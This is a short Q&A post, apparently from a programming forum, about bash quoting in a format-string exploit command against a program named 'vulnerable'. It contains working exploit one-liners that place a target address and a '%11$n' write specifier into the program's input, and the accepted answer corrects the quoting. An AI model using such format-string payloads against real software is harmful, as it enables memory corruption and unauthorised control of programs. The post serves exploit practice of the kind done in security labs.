# Bash - File content in perl print statement

Tags: bash, perl, memory-address, exploit

I'm writing an format string exploit script for a vulnerable program.

I'm able to exploit the vulnerability by executing the program with the following input:

```
./vulnerable `perl -e 'print "\x11\x11\x11\x40\x99\x04\x08"'`'AAAAx%11$n'
```

Here `\x40\x99\x04\x08` is the address of a variable in `vulnerable`.

I want to write a script that generates this input without a hard-coded address.
In my script I retrieve the address of the variable and store it in `address.txt`.
Then I try to call `vulnerable` from my script as I did before, but with the content of `address.txt`:

```
./vulnerable $(perl -e 'print "\x11\x11\x11$(<address.txt)"')'AAAAx%11$n’
```

The content of `address.txt` is `\x40\x99\x04\x08` so there is something wrong with the way I provide the content of `address.txt` to the perl print statement.

I've also tried leave out the `$()` around `perl`:

```
./vulnerable `perl -e 'print "\x11\x11\x11$(<address.txt)"'`'AAAAx%11$n'
```

But this renders the same result.

What am I doing wrong?

Answer (score 1, accepted):

Single quotes don't expand `$(...)`.

```
./vulnerable $(perl -e 'print "\x11\x11\x11'$(<address.txt)'"')'AAAAx%11$n'
#                                           <------------->
#                      <------------------->               <->
#            <------------------------------------------------><---------->
```